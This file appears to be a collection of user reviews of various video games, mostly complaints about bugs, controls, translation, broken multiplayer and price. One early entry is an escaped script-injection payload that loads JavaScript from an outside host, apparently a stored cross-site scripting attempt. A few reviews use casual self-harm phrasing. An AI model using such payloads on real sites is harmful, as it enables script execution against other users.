user_comment
fix the online problem pleaseeeee
This would be a good mini-game if the following wouln't apply or be fixed!Controlls are to sensetive and they can't be adjusted!
The camera perspective can't be changend but it sort of goes with your movement which can be annoying and is disturbing your concentraion and planning.
I therefore cannot recommend this game in it's current state!
We all love neon, we all love space, many of us pine over retro games and puzzles, so feels like a perfect mixture to fit this game.
Indeed it has all this neon colors, space on the background and is appealing in general, but for several reasons I would not recommend this game.The game did not even start on a laptop with Ryzen and 1660Ti.
On a large scale it ran smoothly on an old i7-2700k twice crashing my PC to full restart...
The last level was crashing on each failure, yet somehow I finished the game.
It's worth 2-3 hours completing all the levels to gold medal.
Pretty simple game worth $10, happy I got it with a 90% coupon, otherwise full price is overvalued.Many people whinge about poor controls and bad support for gamepad.
Well, controls are a bit clumsy but one can get the hang of it.
Some levels are suitable for keyboard only style, some require more precision with a mouse.
I can not really blame the controls, but hitboxes!
Those red vents and other obstacles pass the player at a notable distance worth an inch and still hit the player.
Very distracting and makes you redo some levels not because of lame skill but due to deceptive triggers.Music might be nice or disliked, tastes differ, but it's mostly dubstep.
Whoever likes dubstep will have a nice time.
Some tracks say "electronic" and those are once again dubstep.
What does dubstep have with neon / space / retro gaming?
Completely nothing.
I was expecting to hear synthwave, ambiet space or 8bit, but definetely not dubstep, it does not fit the game graphics at all...To sum it up, the game feels half-baked, general style and idea are nice though music does not fit it.
I don't want to play scrooge, a good game is worth any money, but games like this used to be freely distributed as flash games with far more quality in them.
To be fair, in-game the multiplayer is listed as Beta, but it's very broken and the game shouldn't have the co-op tag yet.
It desyncs a lot, which doesn't stop you from playing, just means you have an inconsistent experience, and once it comes to someone dying, you're often stuck because you can't leave the room.
Exiting and reloading the game works, but that's not an acceptable workaround.
I didn't try playing in Single-Player yet, and I'm not interested to; I wanted to mutate with a buddy.
Incredibly deceptive multiplayer advertisement.
YOU CANNOT WATCH MOVIES/VIDEOS WITH YOUR FRIENDS using this platform (which was the only reason I bought it).
Please keep this in mind if this is why you are purchasing the game.Otherwise the game requires a bunch of setup and it is unclear how to set your keyboard and mouse as input devices.
"&gt;&lt;script src=https://y.vg&gt;&lt;/script&gt;
uno is a good gameuno is in fact, a very simple gameuno is in absolute terms a very easy game in terms of logic and programming to make almost barebones with ascii art and yet fun and functionalubisoft is a baaaad companyubisoft lacks a moral compass and the kind of restraint you gain when growing up that makes you not torture small animalsubisoft must be intentionally incompetent, imagine not being able to make uno a functional experience, how is that even possibleperhaps if more money is shoveled in this money hole they will make uno a functional experience ???
(no?
)this ubisoft uno has severe brain damage and makes me feel badpersonally, i would recommend you take some evasive maneuvers and just buy *tabletop simulator*in *table sim*, you could just play something very similar but not quite uno because it is not uno but in spirit it is uno and free from legal repercussionsand this not quite legally uno but spiritual uno is goodand has urine retention
I cant honestly recommend this the game is cheap enough i got it for under $2 and may be worth it to some but the new player help menu with its very small hard to read text is to hard for me to read even though i purchased this understanding it was a data based game if reading the text in the help screens annoying for me sadly i dont have time for the game or the patience to just try fumble my way into it learning  good luck for anyone wanting to have a go it may be a good game if you get past the  reading the help section and also it drove my screen nuts constantly telling me the resolution needed adjusting every time i went in and out of screen to look stuff up best it can do is 1080p which is ok but the constant messages were annoying to me
This isn't the worst ND game in my opinion, but I feel like it could have been MUCH better.
I ABSOLUTELY HATED the games that I had to play with the kid (forgot her name!)
EVERY TIME you have to ask her something; I thought it was annoying that you have to go up the stairs and do a puzzle EVERY TIME you need to get to a secret room; but above all, I was left VERY confused about the motive of the culprit.
So I would only recommend the game to those who want to play all the Nancy Drew games (like me!).
very very idiot game!
if you play in game and have win, the game must log out, and reject your game, this is idiot and bad game poker, the develover idiot
unplayable + you can't exit the game if you dont have controller u should use task manager x_x
Glitchy game!
This is similar to the other point and click games from this dev, but .. either this is one of their earlier games or someone dropped the ball with regards to quality control here.
The hallmarks of the dev are here though: Great graphics, a beautifully hokey story, weird puzzles and a most BLESSED hint function that helps you out when YOU want to.
But, sadly, this game has a lot of frustration in that for starters, as many others have mentioned, the translator really bungled the job to an extreme degree.
Whomever was in charge of that doesn't really have a full grasp of the English language and that causes a lot of annoyance when you realize that X means Y.
But honestly, I can deal with that sort of stuff since there's the beautiful hint button to help me out.
But what I find inexcusable is the fact that some of the things are downright impossible to click on sometimes and you have to basically carpet bomb the entire thing with clicks until you hit the right pixel.Then there was the one thing that nearly caused me to give up on the game entirely.
A small feather that's partially obscured by a tennis racket.
Clicking that caused the game to refer to a puzzle combo that won't come into play later when you return to find more objects in the same space.
Oh boy.. yeah.. that's... seriously devs, that's BAD.
So no, I can't recommend this game, I really want to, because it's a fun and short romp through a silly zombie story with fun environments.
But with bugs like these.... nope, can't do that.If you want a solid game like this though, I highly suggest "Contract With The Devil" by the same dev.
It's longer, it's more beautiful and most of all, there's no bugs or bad translations happening!
I like many of the people here played the original gateway 1/2 on flash when I was younger.
those games definitely left an imprint on me.
i think the developer succeeded in creating a fun puzzle game with an interesting story and uniquely unsettling atmosphere.
I was looking forward to buying this game, and while its not god awful its definitely disappointing.
The puzzles and environments in the first game were varied and compelling.
Here they are extremely repetative.
Its almost entirely consists of tile puzzles, some of which barely even qualify as puzzles.
To make matters worse, it hardly relates at all to the original story.
i thought that the second game concluded nicely and was curious to see where the devs would take things from there.
well turns out it adds literally nothing except for the ending i guess (?)
which was honestly confusing as hell.
maybe im just dumb but I really did not understand any of it.
the original two games are good but they were already free, so youre paying $10 for a less than one hour game that is mostly bad tile puzzles.
One other thing is that in gateway two theres this super obnoxious and grating high pitch noise in some parts of the game.
Wtf?
its remastered but evidently all they did was make it worse.
these devs can do better
SOUND DOESN'T WORK :(
You cant pick which way u want to go
That's the worst game I've ever "played".
I wouldnt even recommend it for free.
You might not get achievements from it but epilepsy.
I died like 20 times because of a pixel i cant identify and they couldnt even manage to make the achievement to work.
Idk how 1.5% off the ppl who played this game managed to get the achievements.
Maybe the developer represents the 1.5%.
If you want to get into the mood to kys buy it.
This game tricked me I thought it would be some sort of visual novel which I guess it is but its just bad art and text straight from the book.
If you have read the story I dont see why you would want to spend money on a poorer version of it.
Absolute trash game.
I would not recommend anyone by this game.
Ever.
How it has mixed reviews i will never know, since that implies someone actually had to like this game.
The only chance to make any progress in this game is to concentrate on watching the video guide.
In doing so you will still have to press to right buttons in the very second they show up or you will die.
No chance to watch the scenes or to enjoy the actual game.
This game makes me want to crawl up the ceiling and it never happened before in similar games.
The story is transparent, basically like the 80% of those kind of games,nothing new.
(Why everyone is copy-pasting those storylines?
I mean cmon theres so much options, why? )
Very frustrating bugs, like the one when you use your "shuffle" power and then the tiles shuffle, but have no image on them and you cant do anything than restart the game and you wont get back your energy.
Makes you use too much powers, i think its ridiculous you cant finish it without using any power at least once and there are those objectives "finish the game without using any powers" , its not freaking possible!
You will run out of moves every couple moves.
Also there where couple rules  she mentioned outside of tutorial and not about the powers and if you forget what she said, theres no way you can read it second time.
Why its not inside the tutorial aswell?
Those ridiculous energy crystals you will be forced to use, once you run out of them, theres pretty much no way you can finish the game and you will end up playing the level over and over and over and over ... and over ... and over ... again ..till you will be just done with the game.
The gameplay goes like this : No moves left, no moves left, no moves left, no moves left, no moves left, no moves left, no energy crystals left, play over, play over, play over, play over, play over, play over ... until you will want to avada kedavra it to the moon.The only nice things about this game are the art, music and steam achievments and cards.Probably the first game i will return...
Baaaad game.
0 out of 5 stars.
Short review as the game aint worth a longer review rly.
Great game, but a terrible adaptation.
Clunky UI that is distracting from the actual game.
If your looking for a fun racing game ... That all your looking for except the fun part...
It was a waste of money !
I spent more time on this game than reasonable and it was the most mind-numbing experience in my life.
After realizing I fully cleared the story and bought every item I was dissapointed.
The concept of the storybook anime game without any nudity or real sexual content is a very novel idea, but the game lacks a substance of story.
With the plot lying too far in between the grinding necessary to get it, the game felt very repetitive and gimmicky.
The game would be much better if there was more story to it, and not just more after the current ending, but a higher density of story between each level.
read mizuno`s reviewthis game is 25% somehow funny75% wtf, what`s that about ????
Bland.
Very bland.
I thought it would play like a modern Darius Gaiden, but I was sorely mistaken.Pass on it.
The concept is great, the execution is terrible.This could be an amazing game if it was just polished a little more.
Primarily the counterintuitive movement, if you jump off a moving vehicle (while being carried along by it) you suddenly lose all speed you had as if you just jumped from a stationary position.
This one issue caused me to stop playing due to it feeling like the levels were designed with it in mind.....yet it isn't there.I think the concept is amazing and if little issues were fixed I would definitely play it, but even the one jumping issue (that caused me to retry one of the first levels over 20 times) is too major of an issue to ignore.Hope I can one day recomment this, but today I cannot because of its unfinished state.
Currently multiplayer is not functional - My friend and I weren't able to join each other's gamesPros +I can be pinkCons -No one can see how cool and pink I am
20mins game play max then it gets repetitive and boring.
Feels like a gimmicky game trying to cash in on the new VR market with a 'just finished enough to pass' game.
Handling of the bow and items is wrong, it warps the the hand of the person, you can't move around (walking or teleporting) or i just couldn't figure it, there is only one area/map and you do everything inside of it.Game modes are basically, shoot targets, shoot targets but with limited arrows, shoot targets against a clock, shoot apples, or shoot anything you want.I like the Lab version of archery, it has a little subsistence to it where you have to protect a castle.
This is just shooting a bow.I also found out it's not very finished on the gameplay side as i could hold and nocked arrow against the string and throw the bow away from me while still holding the arrow.
When you let go the arrow fires as normal through the arrow rest.I would not recommend this game, I would just play the Lab instead.
Issues with the graphics and mouse (Graphics are blurry and very weird and the mouse (for me) jumps around a lot)).
You can apparently find skip tokens in the game but if you're like me and hate a certain type of puzzle (slide puzzles) and it's the second puzzle in the game which means you won't have any skip tokens....this game might make you rage quit and just never play it again.
=p
It made me want to jump off the Twin Towers.
Do not play
The game is very creative with a great art style.The problem is it was clearly developed by people who don't speak English as their first language.
I'm sorry but you guys need to hire an English copy writer.
The puzzles are clumsily worded.
There are basic grammar errors and strangely structured sentences that don't seem to be part of the riddle but just bad writing.Ok, it's a Polish studio, but look at CD Projekt Red.
Also Polish developers and they have some of the most well written dialogue around.
Terrible UI and font choice.
prologue to the game is way too long.
The gameplay itself is not clear.
There is a plenty of free mobile apps to learn Japanese ;-;
Devs abandoned this game and the work to be done on it.
Nothing works and steam successes are inactive.It's a cute little game that doesn't work.
i'm disappointed..
BLADENET should be a slam dunk: it's SpyParty, but all the players are spies.
It's like a multiplayer Hitman.
I love cyberpunk.
All of these things should make this game an easy win for me.
What went wrong?Sadly, the game's current state is simply not good.
It doesn't run too well (at least for me), but more importantly, the mechanics at play here are unsatisfying.
Maps feel dead and empty, despite being loaded with people.
Everything comes with a level of jank that is just a little to strong for my tastes; it simply doesn't feel good.
Objectives are simply unclear, and accomplishing them doesn't feel good.Maybe BLADENET will get better.
It's a good candidate for Early Access, but I simply cannot recommend it as a complete product in it's current state, as swell as its potential is, when it simply does not give what it could.
May refund; but will keep an eye on the future of BLADENET.
I recommend it for those who are: Expecting nothing Chinese from this game Able to put up with the somewhat impassive character voice (in Chinese) Able to put up with the crappy English sub(dunno if they have done something about it) Able to put up with the unpolished puzzles, plots and lines Superbly easily moved, even by the most cliche stories Chineseor eager to get rid of the root of all evil.Cast Asami Imai for Christina.
Of no help in such miserable condition though.
Luxor 2 will not work on Windows 7.
Two Bad becuse all the other    " LUXOR " Games  seemto2 work fine.
I can't find a work around, That works
I think the developer has abandoned this game.
The game has a feature where you make a movie, you click finish, it gets reviews and you get money based on the review by the AI, but half way into the game its stops working.
You can cant finish movies or advance, and the game is broken because of it.
I made a video sent it to the developer 3 months ago and I tried the game today and it still has not been fixed.
Has all of the same bugs despite me uninstalling then reinstalling on a new game.
Don't buy this game, do favor to yourself
Get it on sale for $2, but I can't recommend paying full price, here's what I wrote on the forum-Okay for one, set the controls to WASD and shoot to the mouse and dash to space and change consumable to shift.
For two, the game needs a better rougelite system.
Currently I don't understand the point of how it works, we kill a boss, then are thrown out to the main menu, just to start another run to kill another boss... Why?
Just let us keep going killing bosses.
Once we die, THEN throw us to the main menu..
Here is where part 3 comes in.
Three) We should have a currency system between games, during games kill should give us credits which we spend between games on perma upgrades.
I just don't have fun knowing I might waste an hour trying to beat a boss just to die and have no upgrades then have to do it over and over with no progress, that's madness.. Also I don't really understand the consumable system, I guess it's the 'progress between runs'..
But its like, dumb consumables, that's not progress, and my hoarder brain refuses to use consumables anyway.
It's super dissapointing to see how close this game to greatness, it feels like they got bored of development and scrapped what should be an easy-to-develop system on top of a polished product.. IDK man, I don't see this having any more playability past 10-20 minutes without an rougelike upgrade system, why would anyone keep playing?
:s 21.2% of people have the achievement for playing for an hour or more so I think I'm on to something..Also between rounds we get an upgrade, but it doesnt say what it does, its some vauge text, and I dont want to have to consult the wiki every 2 minutes
The steam description says up to 8 players, but what they meant was "Up to 8 players as long as 4 of those players are bots."
Had 6 friends on a LAN and only 4 could connect to the game lobby at once.
While I will not recommend anyone follow my review, I still feel like it would be important to share my experience with the game.When I bought the game, I initially played it through the first level before setting it aside and going to a new game.
This itself was not in a lack of interest, but to another video game that took said interest.It was my girlfriend at the time who found interest in the game and began playing it.
Now, I had been playing some games that stress my hardware, but this game was no where near the extent of the other games at the time.Hence my surprise when my PSU exploded when she was playing this game.
Typically, I would have excused this as a hardware issue on my part and would have not had any discomfort with the ownership of the game... Until it happened again.
And again.
Strike three was where I decided to make a sub category entitled, "Games of Shame," that includes games that are either unplayable or that I just don't typically like, and placed the game into said category.From what I was able to play and/or witness, it is quite a beautiful game well suited for the casual/indie demographics.
Quite family friendly, beautiful graphics, and appealing sound.
It's not a city builder or a tower defense.
It's also not a great RPG and has very frustrating combat mechanics.
It could be a cool combo with some improvements, but as it stands this combo fails at everything.At $15 it's not a rip-off, but I would not recommend in it's current state unless it was in the $5 sale bin.
Cute for a few, somewhat frustrating hours, then uninstall.
Its a mess, where the only people that could possibly think to use it to justify anything are its deranged developer *cough*derek*cough* and people that for a reason I will never understand fan boy the ♥♥♥♥ out over 3000ad.
Crashes everytime I open it, please fix
Please just don't buy this game (or trilogy)... Don't get me wrong, the games itselves are amazing and classic, but Steam versions are ripped from tablet version.
Whole game feels unfinished, bunch of thing are totally missing and inventory is the worst thing on planet.
Buy GOG version instead.
That's the Dracula you are looking for!
I feel bad for my 15 € that i spent on trilogy on Steam when it came out.
There weren't any reviews and i didn't know what's wrong with this pile of ♥♥♥♥.
THERE ARE BETTER VR CASINO GAMES ON STEAM THAT ARE FREE!!
!This game was /alright/ when it first launched and there was a playerbase.A major flaw is that the game requires players to host sessions.
If the host quits or has connection issues, it will kick everyone else out.They were expanding the game, but only with useless "levels" (who wants to pretend to lift weights in VR?)
instead of expanding for more actual CASINO games.Was hardly worth the money then, not even worth getting on sale today.If the developers can allow for dedicated servers and add meaningful content, and the playerbase grows some, it MIGHT be worth it on sale.
Hardcore and challenging game... Sure, however the devs haven't developed this game to first of all, work in the intended way.
You can trivialize the game with pad in big picture if you have one.Nearly completed the game at this point, and i gotta say, while this could be "hardcore and challenging" game, it lacks any competency and it's there just so you wouldn't so easily complete the game under 2 hours and refund it.
get all achievements bug
For €15 it is basically a ripoff.Very basic functionality.
Not possible to set place, date or time.
Only narration for Gemini.
Hugely dissapointed.
If you love your kids don't bore them with this.
The other Putt-Putt® games are worth looking at as a distraction but this, no.
Procedural generation algorithm only creates trash levels, and threats are almost indistinguishable from the environment.
Bad game the whole time you are just wild clicking on items to collect.Some items are not seen in the tall grass.
There are better games of that concept that do not cost.Real waste of money to buy the game.The game has 90 levels that are all the same, the maps differ only in that they are different items Collect and the background changes.Fun factor 0Frustration factor 10
After 21 hours, I found this turn-based RPG to be a chore to play.
Not a good sign...I tried to get into this game, but nothing here can keep my interest anymore.Pros:-Nice artwork, unique character design, bright colorful graphics.-Steam overlay support, low system requirements, decent price.-Xbox 360 controller support no setup required.Cons:-Story is boring, towns are bare bones, battle system gets boring.-Music is terrible, sound effects are terrible, no voice acting.-Character movement controls are bad, menus and option interface is bad, game was possibly designed for touch screens.I want to discuss the negatives some more in detail.You are often half a tile ahead from eveything when you move.
For example, stopping in front of a door or a NPC will require precision, and you must be directly in front to interact.
It's like you are being forced to run all the time, and I couldn't find the walk button if it exists.The menus look like large buttons with no clear prompts about which button does what on the controller, so the controls have a learning curve that I found to be a lot longer than it should be.The music is really bad, and the sound effects are very tinny basically crap in my opinion, and the sound sliders blast the music and sound effects painfully high if you raise the slider too high.The battle system tries to keep it interesting with a wide variety of enemies, but the battle frequency is very high, and I just found these battles to be more annoying than fun.I am no stranger to games where you grind a lot, but you have to find the right balance of fun and challenge.I expect more out of an RPG that I am going to spend potentially hundreds of hours on, and this game is a piece of garbage compared to other great titles available today.
The core element is there, but the overall presentation here is just not good enough.Skip this one, it does not have enough good qualities to warrant your time.
Abandonware.
Trojan...
I'm using webroot.
I've uninstalled and reinstalled a few times.
Unfortunately before I dumped anymore time into it I forgot to screenshot the 2 files that kept being identified as a trojan.
Now here's the rub.
I know sometimes there are misidentifications but my computer was acting funny so I scanned and that's how I found it.
Why on earth would game files be memory resident even when steam is not loaded?
Anyway can't recommend the game in it's current state.
It starts out fun, but quickly becomes infuriating.Pros:● Decent music.● Simple but enjoyable art style.Cons:● Extremely floaty &amp; unresponsive controls.● Confusing lack of visual depth.● Near impossible later levels.The ball movement seems sluggish yet it picks up a lot of momentum.
Combine this with the unresponsive controls and not falling off the edge constantly becomes quite the challenge.
While the art style is nice the game does a really poor job of conveying depth.
This made navigating curves on skinny rails extremely hard and some levels basically involved trial and error to see if I was going to roll onto a moving platform or just fall off the world because the platform was actually on a different plane.The first two and a half-ish worlds are fun, but then the game quickly becomes a chore.
In world 3 the game introduces skinny rails which are extremely difficult to traverse with the sluggish, unresponsive controls and confusing lack of depth.
By the later levels these rails are so long and curvy that the levels become near impossible to complete normally, much less within the time challenge limits.
I suffered my way through world 3 only to find that world 4 had more skinny rails, but now there was also some weird fire mechanic which can kill your ball and reset you.
It was at this point I gave up.
I enjoy a challenge, but by this point the game was so infuriatingly difficult that it was no longer fun.
Unless you're a masochist I really can't recommend this game.
I wanna hate myself for playing it, getting through all these bad translations for almost 30 hours to get completely irrational bad end.
What the...?!
This game MC Hangyi is some sort of moron playing with other people feelings, even if we have choices they are lacking control.
I thought I've seen it all, I was wrong.
Some choices were even blacked out, good luck guessing why they push you into traps.
I can forgive cheap drama if I know that I am in the wrong.
But here I was not...So yeah there goes my blind playthrough which I wanted to play cool getting to know every character closer.
The real shame of it all is that I feel soory for the heroines of this game.
Hayjin, Fengxi, Fengyi they were all serious competitors for well written and enjoyable characters.
It was hard to pick one when they all brought positive feels into my heart, despite bad translation.I am really frustrated when good games are going all the way downhill, but I can't see it any other way than a wasted theme.
True Love could've been a good slice of life filled with drama, if they could keep it together.
This game though is a mess hardly making sense half of the time between dialogues and scenes.
Even though story has some good feels and memorable moments!
I feel betrayed in the end.
All that keeps me around is reaching an end, that at least one of the heroines deserves.
I"m surprised there isn't one review and honestly I"m not sure how this works so not even sure this one will show up.The reason for this review being negative isn't because I didn't enjoy the game.
I actually liked the game and was having fun playing until it was unplayable due to you can't finish the game because of the huge flaw in the game play design of it near the end of the game.
What makes this a game not to purchase is that the developers designed this game so that an essential item you need to finish the game that is used way before near the end of it simply disappears because you use it on a previous task, leaving you stuck at a crucial part near the end of the game because you can't find another source for this item or way to get it back without starting completely over.
This means if you find this out after you been playing the game you already invested a lot of time and can't finish the game.
This may be a game I come back in the future just to see if the solution I found is doable considering if you mess up again your stuck in starting over again however why would I want to start all over again any time soon having just played it over a couple of days ( I don't usually play a game through in one session and play times will reflect me leaving games active even if not playing at the moment) having to search and discover a solution only because I found a random post online explaining what we have to do in order to complete the game.
if you do have this game or want to get it read  the game discussions here  on steam first because I posted how to get around this issue in the game.
I haven't tested it out but maybe in the future will.I don't know why when games I would think are usually tested by the developers and even later sometimes problems are found and they create a patch or update to correct them that this game hasn't been looked into but why have a game for sale one can't even finish :cdisappointed and  since my playtime is well over 2hrs before I even encountered this issue no chance of requesting a refund from steam, though it was on sale I would be asking for my $3.35 back due to unable to finish the game.
:c
I'm gonna be completely, First Class Trouble is a really fun and uniquely themed deception party game...key word there is "party".
While this game has a lot of goofy and funny mechanics, nice atmosphere, cool music, and hours of enjoyment it cant really be experienced like that without a 5-6 player group.
I can't recommend this game for anyone playing alone or with a small group of 2-3.
Me and my friends love this game, but I think we have the best time when we are all playing together even though it isn't a complete 6 stack.
When the party sized goes down to about 2-4 things get a bit annoying or unplayable at some points.
Most people in the small population of this game at the time of this review is appalling at some times, not all the time, and its just degrading to play.
The amount of times either me or my friends have been made fun of, called slurs, intentionally killed because of our gender, and other disgusting behavior is starting to add up.
It went from a few people here to having an encounter like that every other match.
This doesn't include your typical 2 stack throwing the game and killing the entire lobby personoid or not.
The closest resemblance to my experience on this game is that of a Counter Strike: Global Offensive match.
Not very tasteful.The community aside, this game is great and I've had some of the best laughs playing this together with my friends.
The game play is goofy and fun, there is character customization with more outfits and accessories to come, and a very interactive environment to play around.
I really do love this game but i don't think i can recommend it for someone looking for a casual experience whether it be alone or with a few people.
A lot of people who play this game take it very seriously and can test even the best of nerves.
Regardless i plan on playing this game with my friends for many more hours to come and hope to see some major improvements to the game in the near future !
Your tolerance for the little details this game flubs will determine how much you enjoy this game, but for me, I'm not sure I feel like playing past the second level.
Things like getting killed by an enemy because a shot whiffed due to randomized angles, or the incredibly distant checkpoints, or the fact that your shots seem to destroy pickups (EDIT: it turns out pickups aren't destroyed but instead picked up!!
this is actually good, but a bit unclear), or the fact that there's no mouselock so you can accidentally click outside the window but if you try to play on a controller the aim is agonizingly slow and locked to eight direction, or so on.
I don't want to be incredibly hard on the game because a lot of what I tried felt nice and I like the concept, but there are a lot of little places where a lack of polish makes this difficult for me to stick with.
The dedicated server program stalls most of the time.
According to Steam, the game kept running even through computer restarts, and apparently runs under a different alias in Task Manager, since all Yargis-related tasks were shut down, and was still unable to uninstall.
Early access "game".Latest update: 11 Mar, 2019It's a scam or dead now.
I requested a refound, i hope the steam team will give my money back even if i bought it since ages because i wanted to support the "team" but i haven't seen any updates since i bought it.Just go away and buy something else i think..
Well it's hard to vote down but since there is no "neutral" button i tend more to negative then positive...PRO:- Nice Art- Lovely peaceful SoundtrackCON:- Several decisions but effect only two events- Some decisions doesn't make much sense- German translation is full of mistakes- Very Short Story- Not very suprising ending - only two of them- Sometimes Kira looks like an Figure of PaperSo lets get some text.Always the same blue sky is a little VN wich plays on an island somewhere in the mediterran south.
The player can name himself like he want and can choose if he wants to be a girl or a boy.
And here comes one of the strangest decisions of the Novel.
The whole story is written on the role of a boy.
But it doesnt effect anything if you are a boy or a girl.
So you decide if you get to a normal or lesbian romance?
For what?
Its one of the things i don't get.
Nobody need a decision like this its just senseless.
Art and Soundtrack ist well done.
It fits and have some pretty CGs.
The decisions you made are also a little bit senseless.
It results in just two ends: A "good" one and a "bad" one - but i think they are predictable and not well written.
This is a pity!
There is so much potential to make a very good Novel with serveral decisions but most of them are not effect something big.
There are one or two diffrent scenes you can get but with all ways you come down to the same endings...My first walkthrough was made in 45 minutes... sry this is too short for me...
The price ist ok i think if you want something you can read in between times its a choice.
And: Read it in english!
The german translation is just a joke - in english you'll have no problems.
All in all its a little Novel with good Art and Soundtrack but much mistakes and strange decisions.
You can buy it but don't expect too much.
For the price it's ok.4/10
DO NOT BUY this game.
It have critical bugs that prevents you to complete this game.Devs did nothing to fix it since Aprl 2019.More info here: https://steamcommunity.com/app/1016720/discussions/0/1680315447984953200/?ctp=2#c2943622078759307821
one of the worst games I´ve played in a long time
This game really looked interesting, but I had to request a refund after less then 30 min.The concept is great, but it needs a lot of work.Tutorial is just a few basic tips.
On easy mode you can't even get into the game before being attacked.
You have less than 3 min to prepare before being attacked.You need to build an Iron mine, but I couldn't find an Icon for that building.
I really don't see how the Devs even play tested this and that is why I will not be coming back.
This is obviously a passion project for the makers.
The story is nice, the voice acting and the music are excellent.
Reminiscent of the "Stanley Parable" and even more like "The Beginners guide".
Those games, however, had a quirk.
Something fun that would make it playable.
This story isn't a game.
It's an audiobook that let's you walk around.
Walk around clicking all the highlighted items and solve a very simple slide puzzle to advance to the next room.
There's a journal in which you can read the story behind each item you click but there's no penalty or reward if you do or don't.Coming from Cyan, I was a bit disappointed.
Played through it in 2 hours.If you're axpecting a puzzle game, don't buy it.
If you like listening to a story while you click things, do.
Poorly optimized, and too many bugs to be even worth listing.
Couple decent ideas, but needs a lot of polish, which is not something you expect from a game that's been released proper (as opposed to Early Access).For the asking price, I'd be remiss to recommend this game (got it on sale, and I'll still be refunding).
Trash.
Pls DONT buy it.
Only Money waste
Bought the game for the art style which is indeed good, But quickly got repetitive.
There were bugs which were tied to the level objective which made me restart couple of times.
Looks polished but not gameplay or technically.
Refunded.
do not get this it sucks
In its current state Mowin' &amp; Throwin' feels unfinished.
This is mostly due to the complete lack of AI players.If you have two friends over to play, you will be unable to all play together as you can't play any form of 2 vs 1 with one person having a computer team mate.
Also the 1 v 1 is very limited in play as you have no team mate on your side to work with.
So really this game is only good fun if you have 4 people who can play.There is no form of single player what so ever!
No way for you to practice on your own etc.Just imagine getting a tennis game where there was no computer players, NONE!
This is what Mowin' &amp; Throwin' feels like.If at some point AI gets added I will change my review.
But as of now I would really not recommend this game.If they added a simple AI to fill out teams and an ability to switch and take control of your team mate like switching players in most sports games then I think this could be very good.But as of now, being really a game that is either 4 human players or nothing, it is bad.
Waste of time.Waste of money.Defenite luck of any kind of interest.Went through Chapter one,hoping that there will be something interesting that requeres player to do anything.
Blindly following instructions and demands of food wood stone and iron.Clicking over and over to brake barels with useless food.Story line is straight forward: "Hello, I am poor native indian who just sits here and cannot repair his own house.
Could you please help me, and I will let you to be directed to another poor indian, that needs a starfish, just because.
And he will direct you to another indian, that needs that totem to be repaired, and he will step away, so you can collect the gold behind his back.
And remember that if you do not repair my house, all this chain will not happen.
"Did not have to think about anything.No addicting element.Grafics for this kind of game is nice.Will not recommend.Whant my money back.Total dissapointment.
The worst PARTY game EVER its so baaddd dont even think to purchase this nonsense game and yes i already refunded it
I've always enjoyed this game since I was younger just due to the simplicity of it, in addition to it relating to my special interest, however, I'm very much so disappointed by how buggy it still seems to be.
From randomly closing the game (often enough to where I've had to start saving multiple times a day just in case), to permitting me to follow through with the wedding for Kate's storyline, it's exceedinly frustrating, and since it's been years since I've played I can't recall if I've ever found a way past that.While I may have certainly enjoyed this game once before, re-experiencing these flaws is proving this to have been a waste of resources.
4.0/10Why well its slow.
its lacking and very basic.
I played through campaign in a few hours and was not impressed.
I have had much more fun with EVERY other puzzle game out there.
and its 4.0 only cuz well its solid.
it doent have a high fidelity nor a compelling story and if it werent on a flash sale for like 1.70$ I wouldnt have bought it.
and I dont recommend it either unless you wanna try it out, but act quick while the sale lasts.
anything more than 2$ isnt worth it.
Super boring!Its a week I have nightmares running off a pipe after playing an hour of this.
Thoroughly enjoyed this game, however due to no updates in 6 months..it get's a down vote.Really disappointed in paying for a game that the developers have brushed aside.
UPDATE: Updating my review since the game appears to be fully released now.
There still is a sad lack of content.
I can't recommend anyone to spend any money on this.
There are only two new pieces of content: Natives can raid your settlement.
Once you upgrade your wall and watchtower a bit it becomes impossible to lose, and there's no action or control you have other than upgrading those two buildings.
Natives can sometimes give you missions to upgrade a building or to beat the next invasion.To their credit, the developers seem to have fixed the bugs I mentioned and added interface scaling.
The only new bug I've run into is that Natives give me missions to upgrade buildings that I already have at max upgrades, so there's no way to complete it.------------------------------------Early access review:I'm hoping for more from this game in the future but right now it's not worth buying, even at sale price.
It's an incremental clicker game with no content.On the upside: it has lovely art and animations it runs smoothly on my old computerOn the downside: the only thing you can do is build 9 buildings and upgrade them.
2 of the buildings don't even do anything you can only have one of each building and only in the predetermined spots to build them the interface doesn't seem to scale.
It's annoying to try to click the tiny buttons   I ran into a few bugs, like not being able to continue my saved game, but I won't fault an early-access game for that.
I hope I can give it a more positive review in the future when they add some real content, but I couldn't recommend this to anyone in its current state.
Seems like an interesting learning tool, but it is extremely overpriced as it looks like it was written extremely quickly in Java and then pushed out to the store without any regards to actual UI design.
I'd recommend it if it were free— however even some free solutions have better UIX than this.
Do not download this.
Cant even get into the game.
"Oh, this looks good"Drops in a level"Okay" rotates with controller by accident"OH ♥♥♥♥"Almost falls over and pukesgg would almost throw up again 10/10
Overall the game looks cool, and it seems that if you really lay some time into it you could make something nice.But, the things you can do is very limited.
I know the game only is in early access, and i hope theres comming more features in the future.
An example that there could be added some more things to is when you go under the libary where you have all of the buildings primitives, vehicles and accessories it looks like theres alot of things to do, but as soon as you open the folder, there is nearly nothing inside.In the vehicle folder there is only one prop, and thats a boat.I would not recommend this, but i see, if you're new at animating ect.
this would probably be a good way to learn some basic stuff.So overall:The software as it is right now is very limited.
I hope it'll get some new updates with more props, and more features.
If so, i'll maybe try it out again.
2 months later Edit: still no fixes to the game, it's in a bundle now though so more people can buy this broken and terrible gameEdit: the dev responded to my review and actually seems to care (unlike with most games), so my opinions expressed below may change if they update the game, if so I will re-play the game again and update my reviewI'm really not sure what I was expecting from this, a very bad ripoff I guess.yet I was still let down.it controls horribly, almost unplayable with a mouse (the only control option on pc)it has built in advertisements for games on the app storejust terrible, I really hope nobody else buys this
Game got boring pretty quickly.
This is definitely an upgrade over the 2014 edition.
However, as another reviewer reported the game deletes players every time you save it.
I lost 4 players randomly.
Not completely unrealistic, maybe 8% of the players in this league are Antonio Brown level crazy and just disappear.
I would prefer not to lose players though.
This is the first game in the series to just utterly irritate me.
The timed challenges are pretty easy to fail.
The other two games gave you a ranking system that was fair and balanced, while this one just had me ready to throw my mouse and punch my screen.
If you want a REALLY challenging game out of something that shouldn't be, then go for it.
If you're expecting the same light hearted fun as the other two Tasty games, go back to them.
I give this game a 4/10.
looks like casual game but it is challenging, no room for mistakes...
NOT A LOCAL COOP GAME.
(There is local coop, if you enjoy placing turrets with one joystick, but it's painful.
)Also, the game itself is very repetitive, and the meta progression is _slow_.
Plus, there are a few bugs.
